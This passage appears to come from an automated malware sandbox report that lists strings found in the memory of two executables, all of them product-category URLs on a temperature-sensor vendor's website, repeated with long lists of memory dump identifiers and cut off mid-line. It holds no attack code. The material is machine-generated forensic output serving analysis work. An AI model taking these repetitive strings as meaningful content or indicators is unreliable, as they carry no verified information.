00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/temperat
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/cryo-temp-temperaturna-tipala-za-z
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/digital-temperaturna-tipala/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/dodatna-oprema-za-temperaturna-tip
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/ex-temperaturna-tipala-z-atex-cert
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/field-mounted-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/high-temp-temperaturna-tipala-za-v
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/industry-temperaturna-tipala/tempe
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/kanalska-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/mims-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/nastavljiva-temperaturna-tipala-2/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/on-site-cal-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/povrsinska-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/prenosna-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 